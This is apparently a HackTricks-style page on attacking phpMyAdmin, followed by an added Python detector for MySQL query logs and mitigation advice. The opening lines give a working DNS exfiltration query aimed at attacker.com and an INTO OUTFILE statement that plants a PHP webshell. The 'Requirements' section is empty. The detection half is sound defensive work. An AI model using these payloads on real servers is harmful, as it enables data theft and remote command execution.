phpMyAdmin HackTricks Verified

If outbound internet access is allowed but direct connections are monitored, use DNS:

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT @@version), '.attacker.com\\share\\test'));

Verified: Works on Windows MySQL (due to UNC path behavior). On Linux, it requires the Dns-loadfile UDF.


If you have credentials, you can use SQL to write a webshell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

Look for /phpmyadmin/themes/pmahomme/img/logo_left.png. Combined with doc/html/index.html or README, it lets you extract the exact version. Version matters because exploits differ widely between 2.x, 3.x, 4.x, and 5.x.

HackTricks Tip: Use whatweb target.com/phpmyadmin – it often extracts the version from the meta generator tag.


Sometimes an attacker only gets low-priv database access but no file write. Still dangerous.
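
Both file-based statements shown earlier on this page (LOAD_FILE with a UNC path, and SELECT ... INTO OUTFILE into the web root) leave recognizable text in the MySQL query log. The following is an added example, not code from the original page: a small detector run over constructed log lines. The log line layout, the web root list, the finding labels and the example.test domain are assumptions.

```python
import re

# Assumed layout of a MySQL general query log line: timestamp, thread id, command, argument.
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+Query\s+(?P<sql>.*)$")
# SELECT ... INTO OUTFILE / INTO DUMPFILE '<path>'
OUTFILE_RE = re.compile(r"""\bINTO\s+(?:OUT|DUMP)FILE\s+(['"])(?P<path>.*?)\1""", re.I)
LOAD_FILE_RE = re.compile(r"\bLOAD_FILE\s*\(", re.I)
# A quoted string that begins with two or more backslashes (start of a UNC path).
UNC_RE = re.compile(r"""['"]\\{2,}""")
SCRIPT_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar|jsp|aspx?)$", re.I)
# Assumed web roots; adjust to the hosts being monitored.
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/", "c:/inetpub/")

# Constructed sample log lines (not real traffic); example.test is a placeholder domain.
SAMPLE_LOG = [
    "2024-05-01T10:00:01.000000Z 41 Query SELECT id, name FROM shop.products WHERE id = 7",
    r'2024-05-01T10:00:02.000000Z 42 Query SELECT "<?php /* placeholder */ ?>" INTO OUTFILE "/var/www/html/shell.php"',
    r"2024-05-01T10:00:03.000000Z 43 Query SELECT LOAD_FILE(CONCAT('\\\\', (SELECT @@version), '.example.test\\share\\test'))",
    "2024-05-01T10:00:04.000000Z 44 Query SELECT * FROM shop.orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "2024-05-01T10:00:05.000000Z 45 Query SELECT LOAD_FILE('/var/lib/mysql-files/report.txt')",
]

def classify(sql):
    """Return a list of finding labels for one logged statement."""
    findings = []
    m = OUTFILE_RE.search(sql)
    if m:
        # Normalise separators so Windows and POSIX paths compare the same way.
        path = re.sub(r"[\\/]+", "/", m.group("path")).lower()
        risky = SCRIPT_EXT_RE.search(path) or path.startswith(WEB_ROOTS)
        findings.append("file-write-to-web-content" if risky else "file-write")
    lf = LOAD_FILE_RE.search(sql)
    if lf and UNC_RE.search(sql, lf.end()):
        findings.append("load-file-unc-path")
    return findings

def scan(lines):
    """Return (thread_id, findings) for every Query line that matched a pattern."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            findings = classify(m.group("sql"))
            if findings:
                hits.append((int(m.group("thread")), findings))
    return hits

if __name__ == "__main__":
    for thread, findings in scan(SAMPLE_LOG):
        print(thread, ", ".join(findings))
```

On the server side, both statements need the FILE privilege and are constrained by secure_file_priv, so the durable mitigation is to withhold FILE from application accounts and set secure_file_priv to a dedicated directory or NULL.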